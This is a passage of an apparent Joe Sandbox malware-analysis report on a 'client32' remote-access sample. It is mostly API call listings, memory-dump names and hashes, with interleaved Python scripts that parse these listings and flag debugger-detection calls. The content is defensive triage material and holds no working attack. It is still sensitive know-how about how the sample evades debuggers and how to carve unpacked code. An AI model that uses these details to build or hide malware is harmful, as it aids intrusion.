• Instruction Fuzzy Hash: C621C975900610DBDB20DF64D868B9E77F8AF41319F440869E99AD7151CF74D944CBA0
APIs
• GetCommandLineA.KERNEL32 ref: 00401024
• GetStartupInfoA.KERNEL32(?), ref: 00401079
• GetModuleHandleA.KERNEL32(00000000,00000000,00000000,0000000A), ref: 0040109C
• ExitProcess.KERNEL32 ref: 004010A9
Memory Dump Source
• Source File: 00000007.00000002.4094618180.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000007.00000002.4094591498.0000000000400000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000007.00000002.4094652158.0000000000403000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000007.00000002.4094673945.0000000000404000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_400000_client32.jbxd
Yara matches
Similarity
• API ID: CommandExitHandleInfoLineModuleProcessStartup
• String ID:
• API String ID: 2164999147-0
• Opcode ID: 14085ec075f93681cd44e9da420e50c529999ece7765cc5c856b362def1b15a9
• Instruction ID: f614a552efd759633e5898ba04cf1d4763a2e92f88735b9f7b762142f34247ec
• Opcode Fuzzy Hash: 14085ec075f93681cd44e9da420e50c529999ece7765cc5c856b362def1b15a9
• Instruction Fuzzy Hash: BC1182201083C19AEB311F248A847AB6F959F03745F14047AE8D677AA6D27E88C7862D
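The per-function "APIs" listings above follow one fixed line shape (a bullet, an optional "Part of subcall function <addr>:" prefix, API.MODULE, optional argument list, and a "ref:" call-site address). Pulling them out of a report this size by hand is impractical, so here is an added example, not part of the Joe Sandbox report or of NetSupport, that parses those bullets into call-site records, counts them per module, and flags the debugger-detection APIs the report's signature summary mentions (IsDebuggerPresent, OutputDebugString). The sample input is a handful of lines copied from the entries on this page; the watch-list of API names and the record layout are this example's own assumptions, not a Joe Sandbox rule.

```python
import re
from collections import Counter

# Constructed sample input: lines copied verbatim from the report's per-function
# "APIs" listings (the bullets and the "Part of subcall function" prefix are the
# report's own notation).
SAMPLE_LINES = """\
• TlsSetValue.KERNEL32(?,?,?,?,?,68820A34,00000001,?,68820A54), ref: 68820B1E
• CloseHandle.KERNEL32(?,?,?,?,?,68820A34,00000001,?,68820A54), ref: 68820B54
• timeGetTime.WINMM ref: 110590FC
• LeaveCriticalSection.KERNEL32(?), ref: 110591AA
  • Part of subcall function 6882AB7A: GetCurrentThreadId.KERNEL32 ref: 6882ABA2
  • Part of subcall function 6882AB7A: swprintf.LIBCMT(?,00000401,[%d:%d:%d:%d(%d)] ,00000000,?,6882A924,?,?,000000F8), ref: 6882ABCC
• __aullrem.LIBCMT ref: 6882A9B8
• OutputDebugStringW.KERNEL32(?), ref: 6882A9E4
"""

# One bullet = one call site. The argument list is optional (the report omits it
# when it recovered none) and may itself contain parentheses, e.g. a printf
# format string, so the greedy ".*" deliberately runs to the last ")" before
# ", ref:".
_CALL_RE = re.compile(
    r"^\s*•\s*"
    r"(?:Part of subcall function (?P<subcall>[0-9A-Fa-f]+):\s*)?"
    r"(?P<api>[A-Za-z_][\w@?]*)\.(?P<module>[A-Za-z0-9_]+)"
    r"(?:\((?P<args>.*)\))?"
    r",?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)

# Assumed watch-list (this example's choice): APIs the report's signature summary
# associates with debugger detection.
DEBUG_CHECK_APIS = {
    "IsDebuggerPresent", "CheckRemoteDebuggerPresent",
    "OutputDebugStringA", "OutputDebugStringW",
}


def parse_api_lines(text):
    """Turn report bullets into call-site records; lines that do not match are skipped."""
    records = []
    for line in text.splitlines():
        m = _CALL_RE.match(line)
        if not m:
            continue
        raw_args = m.group("args")
        # Naive comma split: good enough for the report's "?"/hex placeholders,
        # but a format string containing a comma would be split too.
        args = [a.strip() for a in raw_args.split(",")] if raw_args is not None else []
        records.append({
            "api": m.group("api"),
            "module": m.group("module"),
            "args": args,
            "ref": m.group("ref").upper(),
            "subcall": (m.group("subcall") or "").upper() or None,
        })
    return records


def summarize(records):
    """Count call sites per module and list the debugger-detection call sites."""
    by_module = Counter(r["module"] for r in records)
    flagged = [(r["api"], r["ref"]) for r in records if r["api"] in DEBUG_CHECK_APIS]
    return {"by_module": dict(by_module), "flagged": flagged}


if __name__ == "__main__":
    recs = parse_api_lines(SAMPLE_LINES)
    for r in recs:
        origin = f" (via subcall {r['subcall']})" if r["subcall"] else ""
        print(f"{r['ref']}  {r['module']}!{r['api']}({', '.join(r['args'])}){origin}")
    print(summarize(recs))
```

Feed it the whole report text instead of the sample and the `flagged` list becomes a quick index of where client32 touches debugger-detection APIs, keyed by the same "ref:" addresses the report uses, so each hit can be looked up in the matching memory dump.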
APIs
  • Part of subcall function 6882AB7A: GetCurrentThreadId.KERNEL32 ref: 6882ABA2
  • Part of subcall function 6882AB7A: swprintf.LIBCMT(?,00000401,[%d:%d:%d:%d(%d)] ,00000000,?,6882A924,?,?,000000F8), ref: 6882ABCC
  • Part of subcall function 6882AB7A: vswprintf_s.MSVCR100(00000401,00000401,?,?,?,00000002,?,6882A924,?,?,000000F8), ref: 6882ABEE
  • Part of subcall function 6882AB7A: _wcslen.LIBCMT(?,00000401,00000401,?,?,?,00000002,?,6882A924,?,?,000000F8), ref: 6882ABF4
• _fwprintf.LIBCMT(68883048,?), ref: 6882A9A1
  • Part of subcall function 6883481C: _errno.MSVCR100(688348A8,0000000C,6882A812,?), ref: 68834838
  • Part of subcall function 6883481C: _invalid_parameter_noinfo.MSVCR100(688348A8,0000000C,6882A812,?), ref: 68834843
• __aullrem.LIBCMT ref: 6882A9B8
• fflush.MSVCR100(00000032,00000000), ref: 6882A9D5
  • Part of subcall function 687EEEF1: _lock_file.MSVCR100(?,687EEF38,0000000C), ref: 687EEF0B
  • Part of subcall function 687EEEF1: _fflush_nolock.MSVCR100(?,687EEF38,0000000C), ref: 687EEF17
• OutputDebugStringW.KERNEL32(?), ref: 6882A9E4
Memory Dump Source
• Source File: 00000007.00000002.4097447824.00000000687D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 687D0000, based on PE: true
• Associated: 00000007.00000002.4097426862.00000000687D0000.00000002.00000001.01000000.0000000E.sdmp
• Associated: 00000007.00000002.4097511143.0000000068884000.00000004.00000001.01000000.0000000E.sdmp
• Associated: 00000007.00000002.4097532016.0000000068886000.00000008.00000001.01000000.0000000E.sdmp
• Associated: 00000007.00000002.4097551046.0000000068889000.00000002.00000001.01000000.0000000E.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_687d0000_client32.jbxd
Similarity
• API ID: CurrentDebugOutputStringThread__aullrem_errno_fflush_nolock_fwprintf_invalid_parameter_noinfo_lock_file_wcslenfflushswprintfvswprintf_s
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 3120632072-0
                                                                                                                                                                                                    • Opcode ID: 656b0585659072eeca484be823eec17511422e0cef74be82d6ba6d7bf753a14b
                                                                                                                                                                                                    • Instruction ID: d09ddfebd104387db1bbbf141e32aac6d59310a5df83fbe2ca10b35e65b07ea7
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 656b0585659072eeca484be823eec17511422e0cef74be82d6ba6d7bf753a14b
                                                                                                                                                                                                    • Instruction Fuzzy Hash: DA11A5B1540209EFDF44DF69DD55A6D37B8FF06304F90445AE419A2050EF309E94CB94
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                      • Part of subcall function 68820376: TlsGetValue.KERNEL32(68825BA3,?,00000000,?,68815C77,00000001), ref: 6882037C
                                                                                                                                                                                                    • Concurrency::unsupported_os::unsupported_os.LIBCMT(?,00000000,?,?,?,00000000), ref: 68820AA0
                                                                                                                                                                                                      • Part of subcall function 68818154: std::exception::exception.LIBCMT(00000000,00000000,?,?,68820AA5,?), ref: 68818168
                                                                                                                                                                                                    • _CxxThrowException.MSVCR100(?,68880D68,?,00000000,?,?,?,00000000), ref: 68820AAE
                                                                                                                                                                                                      • Part of subcall function 687F86E8: RaiseException.KERNEL32(?,?,6880F30F,?,?,?,?,?,6880F30F,?,687EC888,68888518), ref: 687F8727
                                                                                                                                                                                                    • TlsSetValue.KERNEL32(00000000), ref: 68820AC9
                                                                                                                                                                                                    • TlsSetValue.KERNEL32(00000000,?,?,?,00000000), ref: 68820AF4
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000007.00000002.4097447824.00000000687D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 687D0000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000007.00000002.4097426862.00000000687D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4097511143.0000000068884000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4097532016.0000000068886000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4097551046.0000000068889000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_687d0000_client32.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Value$Exception$Concurrency::unsupported_os::unsupported_osRaiseThrowstd::exception::exception
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1973407479-0
                                                                                                                                                                                                    • Opcode ID: 19579b08c8bc7c73f8af1768df4eb6b7d32be232190545ca9ed97414b08d262b
                                                                                                                                                                                                    • Instruction ID: 8f82e27819394ad15b22afc824ab3ff8b9818781b40a41823e370bfbc8efc55c
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 19579b08c8bc7c73f8af1768df4eb6b7d32be232190545ca9ed97414b08d262b
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9701F271641214EFCB21AB69CC68A9DF7B4EF46358B810966E46683250DF30A901CBC1
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • SystemParametersInfoA.USER32(00000029,00000154,?,00000000), ref: 111313B1
                                                                                                                                                                                                    • CreateFontIndirectA.GDI32(?), ref: 111313CF
                                                                                                                                                                                                    • CreateFontIndirectA.GDI32(?), ref: 111313E5
                                                                                                                                                                                                    • CreateFontIndirectA.GDI32(FFFFFFF0), ref: 111313FB
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000007.00000002.4096691220.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096672888.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096807356.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096848908.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096871958.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: CreateFontIndirect$InfoParametersSystem
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 3386289337-0
                                                                                                                                                                                                    • Opcode ID: cddf9315703bad504045fd98c9e1cfe8d04d1f92840bc27388ccda177a2b43ee
                                                                                                                                                                                                    • Instruction ID: e4efc710e3e979ce8ff1f48ebad8b7127cba25ea1afedff09802414c266bcb73
                                                                                                                                                                                                    • Opcode Fuzzy Hash: cddf9315703bad504045fd98c9e1cfe8d04d1f92840bc27388ccda177a2b43ee
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 92015E719007189BD7A0DFA9DC44BDAF7F9AB84310F1042AAD519A6290DB706988CF51
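The listings above are machine output, so an analyst working through them usually wants them parsed rather than read. The Python below is an added example (not part of the Joe Sandbox report and not NetSupport code) that turns the API reference lines and the memory-dump source names into structured records, decodes the uiAction of the SystemParametersInfoA call at 111313B1, and rebuilds the region map of the module at 687D0000 from its .sdmp names. The SPI_* and PAGE_* values are the winuser.h/winnt.h constants; the meaning of the .sdmp name fields is an assumption inferred from the values on this page (the fifth field reads as page protection: 0x20 over the code at 687D1000, 0x02 over the header at 687D0000, 0x04 and 0x08 over the writable regions; the seventh field, 0x1000000, reads as MEM_IMAGE). The sample text is constructed from lines on this page.

```python
"""Parse Joe Sandbox function-listing lines into structured records.

Added example; not part of the sandbox report or of the analysed sample.
The .sdmp field meanings below are an ASSUMPTION inferred from this page.
"""
import re
from dataclasses import dataclass
from typing import List, Optional, Tuple

# winnt.h page protections (low byte of the assumed protection field).
PAGE_PROTECT = {
    0x01: "PAGE_NOACCESS", 0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
    0x08: "PAGE_WRITECOPY", 0x10: "PAGE_EXECUTE", 0x20: "PAGE_EXECUTE_READ",
    0x40: "PAGE_EXECUTE_READWRITE", 0x80: "PAGE_EXECUTE_WRITECOPY",
}
MEM_TYPE = {0x20000: "MEM_PRIVATE", 0x40000: "MEM_MAPPED", 0x1000000: "MEM_IMAGE"}
# winuser.h SystemParametersInfo actions worth naming when triaging a
# "changes the wallpaper" signature.
SPI_ACTION = {0x14: "SPI_SETDESKWALLPAPER", 0x29: "SPI_GETNONCLIENTMETRICS",
              0x2A: "SPI_SETNONCLIENTMETRICS", 0x73: "SPI_GETDESKWALLPAPER"}

# "• Name.MODULE(args), ref: ADDR" with optional "Part of subcall function X:" prefix
# and optional argument list (GetLastError.KERNEL32 ref: ... has none).
API_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function\s+(?P<sub>[0-9A-F]{8}):\s*)?"
    r"(?P<name>[A-Za-z_][\w:]*)\.(?P<module>[A-Z0-9]+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-F]{8})\s*$")
# proc.snapshot.stamp.base.protection.f6.type.module.sdmp (field roles assumed)
SDMP_RE = re.compile(
    r"(?P<proc>\d{8})\.(?P<snap>\d{8})\.(?P<stamp>\d+)\.(?P<base>[0-9A-F]{16})"
    r"\.(?P<prot>[0-9A-F]{8})\.(?P<f6>[0-9A-F]{8})\.(?P<type>[0-9A-F]{8})"
    r"\.(?P<mod>[0-9A-F]{8})\.sdmp")


@dataclass
class ApiCall:
    name: str
    module: str
    args: List[str]
    ref: int                   # address of the call site
    subcall_of: Optional[int]  # set for "Part of subcall function X" lines


def parse_api_line(line: str) -> Optional[ApiCall]:
    m = API_RE.match(line)
    if not m:
        return None
    raw = m.group("args")
    args = [a.strip() for a in raw.split(",")] if raw else []
    sub = m.group("sub")
    return ApiCall(m.group("name"), m.group("module"), args,
                   int(m.group("ref"), 16), int(sub, 16) if sub else None)


def parse_listing(text: str) -> List[ApiCall]:
    return [c for c in map(parse_api_line, text.splitlines()) if c]


def arg_int(a: str) -> Optional[int]:
    """Hex argument to int; '?' (value unknown to the disassembler) -> None."""
    sign = -1 if a.startswith("-") else 1
    try:
        return sign * int(a.lstrip("-"), 16)
    except ValueError:
        return None


def decode_spi(call: ApiCall) -> Optional[str]:
    """Name the uiAction of a SystemParametersInfoA/W call, else None."""
    if not call.name.startswith("SystemParametersInfo") or not call.args:
        return None
    action = arg_int(call.args[0])
    if action is None:
        return None
    return SPI_ACTION.get(action, f"SPI_0x{action:X}")


def region_map(text: str) -> List[Tuple[int, str, str]]:
    """(base, protection, type) for every .sdmp name in text, sorted by base."""
    seen = {}
    for m in SDMP_RE.finditer(text):
        base, prot, typ = (int(m.group(g), 16) for g in ("base", "prot", "type"))
        seen[base] = (base, PAGE_PROTECT.get(prot & 0xFF, f"0x{prot:X}"),
                      MEM_TYPE.get(typ, f"0x{typ:X}"))
    return [seen[b] for b in sorted(seen)]


def executable_regions(text: str) -> List[int]:
    return [b for b, p, _ in region_map(text) if "EXECUTE" in p]


# Constructed sample: lines copied from the listings on this page.
SAMPLE = """\
• SystemParametersInfoA.USER32(00000029,00000154,?,00000000), ref: 111313B1
• CreateFontIndirectA.GDI32(?), ref: 111313CF
• CreateThread.KERNEL32(00000000,-00000018,68820EC3,00010000,68820EB1,?), ref: 6882AB1D
• GetLastError.KERNEL32 ref: 6882AB27
  • Part of subcall function 6882AA54: LoadLibraryW.KERNEL32(?), ref: 6882AA98
Memory Dump Source
• Source File: 00000007.00000002.4097447824.00000000687D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 687D0000, based on PE: true
• Associated: 00000007.00000002.4097426862.00000000687D0000.00000002.00000001.01000000.0000000E.sdmp
• Associated: 00000007.00000002.4097511143.0000000068884000.00000004.00000001.01000000.0000000E.sdmp
• Associated: 00000007.00000002.4097532016.0000000068886000.00000008.00000001.01000000.0000000E.sdmp
• Associated: 00000007.00000002.4097551046.0000000068889000.00000002.00000001.01000000.0000000E.sdmp
"""

if __name__ == "__main__":
    for c in parse_listing(SAMPLE):
        print(f"{c.ref:08X} {c.module}!{c.name}{c.args} {decode_spi(c) or ''}")
    for base, prot, typ in region_map(SAMPLE):
        print(f"{base:08X} {prot:24} {typ}")
```

Run against the block above, the SystemParametersInfoA call decodes as SPI_GETNONCLIENTMETRICS with cbSize 0x154 (340 bytes, the size of NONCLIENTMETRICSA before the iPaddedBorderWidth field was appended), i.e. it reads the system UI fonts that feed the three CreateFontIndirectA calls that follow. A wallpaper change would pass SPI_SETDESKWALLPAPER (0x14), so this particular call site is not the one behind the sample's wallpaper signature. The region map shows only 687D1000 as executable, which is the region to carve if you want the unpacked code from the dump.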

APIs
• _errno.MSVCR100(00000000,00000000,?,68832A8B,?,000000FF,?,00000000,00000000), ref: 68832922
• _invalid_parameter_noinfo.MSVCR100(00000000,00000000,?,68832A8B,?,000000FF,?,00000000,00000000), ref: 6883292D
  • Part of subcall function 6885AF7E: _invalid_parameter.MSVCR100(00000000,00000000,00000000,00000000,00000000,6882B6CF,?,6882C24B,00000003,688074A4,687EA948,0000000C,688074F7,00000001,00000001), ref: 6885AF85
• free.MSVCR100(00000000,00000002,00000000,00000000,00000000,00000000,00000000,00000000), ref: 68832971
• free.MSVCR100(00000000,00000000,00000002,00000000,00000000,00000000,00000000,00000000,00000000), ref: 68832979
Memory Dump Source
• Source File: 00000007.00000002.4097447824.00000000687D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 687D0000, based on PE: true
• Associated: 00000007.00000002.4097426862.00000000687D0000.00000002.00000001.01000000.0000000E.sdmp
• Associated: 00000007.00000002.4097511143.0000000068884000.00000004.00000001.01000000.0000000E.sdmp
• Associated: 00000007.00000002.4097532016.0000000068886000.00000008.00000001.01000000.0000000E.sdmp
• Associated: 00000007.00000002.4097551046.0000000068889000.00000002.00000001.01000000.0000000E.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_687d0000_client32.jbxd
Similarity
• API ID: free$_errno_invalid_parameter_invalid_parameter_noinfo
• String ID:
• API String ID: 4554520-0
• Opcode ID: 7cce8eb0cc32eb52d18113ebcda93601ad73d19730f340396eb66d676776fd7b
• Instruction ID: 6d2fbe8bf349e1dbd8227efbfb5f5bdb43d2781be213873aff4afb97ea765144
• Opcode Fuzzy Hash: 7cce8eb0cc32eb52d18113ebcda93601ad73d19730f340396eb66d676776fd7b
• Instruction Fuzzy Hash: D9016D7580012CFBCF015FE4CD09EED7B69AF04368F904650B924691A0E7718AA0DBA1

APIs
• CreateThread.KERNEL32(00000000,-00000018,68820EC3,00010000,68820EB1,?), ref: 6882AB1D
• GetLastError.KERNEL32 ref: 6882AB27
• Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCMT(00000000), ref: 6882AB3F
• _CxxThrowException.MSVCR100(?,68880C48,00000000), ref: 6882AB4D
  • Part of subcall function 6882AA54: GetModuleHandleA.KERNEL32(00000000), ref: 6882AA6B
  • Part of subcall function 6882AA54: GetModuleFileNameW.KERNEL32(687D0000,?,00000104), ref: 6882AA87
  • Part of subcall function 6882AA54: LoadLibraryW.KERNEL32(?), ref: 6882AA98
Memory Dump Source
• Source File: 00000007.00000002.4097447824.00000000687D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 687D0000, based on PE: true
• Associated: 00000007.00000002.4097426862.00000000687D0000.00000002.00000001.01000000.0000000E.sdmp
• Associated: 00000007.00000002.4097511143.0000000068884000.00000004.00000001.01000000.0000000E.sdmp
• Associated: 00000007.00000002.4097532016.0000000068886000.00000008.00000001.01000000.0000000E.sdmp
• Associated: 00000007.00000002.4097551046.0000000068889000.00000002.00000001.01000000.0000000E.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_687d0000_client32.jbxd
Similarity
• API ID: Module$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorCreateErrorExceptionFileHandleLastLibraryLoadNameThreadThrow
• String ID:
• API String ID: 488853443-0
• Opcode ID: c2d35d0d4091c9e807e4e9f786531e43e7e96a2bb601ec9c6e715e709f8974eb
• Instruction ID: d7811d8cb5164f17b14287952dea5135286c795d9335dff9aedc47790a5b4400
• Opcode Fuzzy Hash: c2d35d0d4091c9e807e4e9f786531e43e7e96a2bb601ec9c6e715e709f8974eb
• Instruction Fuzzy Hash: 97F02D31640106EBDF08AFA8CC15AAE3B2AFF01300F800838FA26E6050CB35C915DBA1

APIs
Memory Dump Source
• Source File: 00000007.00000002.4097447824.00000000687D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 687D0000, based on PE: true
• Associated: 00000007.00000002.4097426862.00000000687D0000.00000002.00000001.01000000.0000000E.sdmp
• Associated: 00000007.00000002.4097511143.0000000068884000.00000004.00000001.01000000.0000000E.sdmp
• Associated: 00000007.00000002.4097532016.0000000068886000.00000008.00000001.01000000.0000000E.sdmp
• Associated: 00000007.00000002.4097551046.0000000068889000.00000002.00000001.01000000.0000000E.sdmp
Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_687d0000_client32.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: _errno$_invalid_parameter_noinfo_memmove
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 3898388434-0
                                                                                                                                                                                                    • Opcode ID: e9982ba919b5cd3db2891b3bdaf6a90660425bbe22dff51734183ff52d4c84de
                                                                                                                                                                                                    • Instruction ID: 7d7d5beab7f1774b4ee43733ca5fd0fce4730ba73ed6f5a51db26637b8a58305
                                                                                                                                                                                                    • Opcode Fuzzy Hash: e9982ba919b5cd3db2891b3bdaf6a90660425bbe22dff51734183ff52d4c84de
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 98F0A77154530DEBEB215E5DED4C7AA3794BF04758F804436F82896160DB70D850C7F1
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • _lock_file.MSVCR100(?,?,?,?,?,?,?,687EA8C0,0000000C), ref: 687EA891
                                                                                                                                                                                                      • Part of subcall function 687EA48D: _lock.MSVCR100(?,?,?,68836E10,00000040,68836E48,0000000C,68808676,00000000,?), ref: 687EA4BA
                                                                                                                                                                                                    • _fclose_nolock.MSVCR100(?,?,?,?,?,?,?,687EA8C0,0000000C), ref: 687EA89C
                                                                                                                                                                                                      • Part of subcall function 687EA80F: __freebuf.LIBCMT ref: 687EA833
                                                                                                                                                                                                      • Part of subcall function 687EA80F: _fileno.MSVCR100(?,?,?), ref: 687EA839
                                                                                                                                                                                                      • Part of subcall function 687EA80F: _close.MSVCR100(00000000,?,?,?), ref: 687EA83F
                                                                                                                                                                                                      • Part of subcall function 687EA8DC: _unlock_file.MSVCR100(?,687EA8B1,?,?,?,?,?,?,687EA8C0,0000000C), ref: 687EA8DD
                                                                                                                                                                                                    • _errno.MSVCR100(?,?,?,?,?,?,687EA8C0,0000000C), ref: 68808BC3
                                                                                                                                                                                                    • _invalid_parameter_noinfo.MSVCR100(?,?,?,?,?,?,687EA8C0,0000000C), ref: 68808BCE
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000007.00000002.4097447824.00000000687D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 687D0000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000007.00000002.4097426862.00000000687D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4097511143.0000000068884000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4097532016.0000000068886000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4097551046.0000000068889000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_687d0000_client32.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: __freebuf_close_errno_fclose_nolock_fileno_invalid_parameter_noinfo_lock_lock_file_unlock_file
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1403730806-0
                                                                                                                                                                                                    • Opcode ID: 9887ac4b772fa256cecc8e85f018f525a9f1bd4797821bc2492df575557c3336
                                                                                                                                                                                                    • Instruction ID: c2467e6ec93c3b64ff2925d497c862f381a8be244da4c52224c6d5363fadb4f8
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9887ac4b772fa256cecc8e85f018f525a9f1bd4797821bc2492df575557c3336
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8DF062748417099AE7119B78994C76EB7B06F11338F908604A434BA0C0CB3846424FB5
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000007.00000002.4097447824.00000000687D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 687D0000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000007.00000002.4097426862.00000000687D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4097511143.0000000068884000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4097532016.0000000068886000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4097551046.0000000068889000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_687d0000_client32.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: _errno$_invalid_parameter_noinfo_wfsopen
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 972587971-0
                                                                                                                                                                                                    • Opcode ID: 80a578632935dee6ef77630ccfa365ade4c2e455c04d7789f8367b117b433f30
                                                                                                                                                                                                    • Instruction ID: 50debf5fd8fb97030de11cb96f21df7653b2a9d17c2d0b5d395b2bdf660a7a71
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 80a578632935dee6ef77630ccfa365ade4c2e455c04d7789f8367b117b433f30
                                                                                                                                                                                                    • Instruction Fuzzy Hash: CBE0D83A664619EBDB115F5CDD08AAA3B98AF45B58F804421F854AF210DF71D82087F0
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                      • Part of subcall function 1110C420: wsprintfA.USER32 ref: 1110C454
                                                                                                                                                                                                      • Part of subcall function 1110C420: _memset.LIBCMT ref: 1110C477
                                                                                                                                                                                                    • CreateWindowExA.USER32(00000000,edit,00000000,40040004,?,?,?,?,?,00000002,00000000,?), ref: 11007327
                                                                                                                                                                                                    • SetFocus.USER32(?), ref: 11007383
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000007.00000002.4096691220.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096672888.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096807356.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
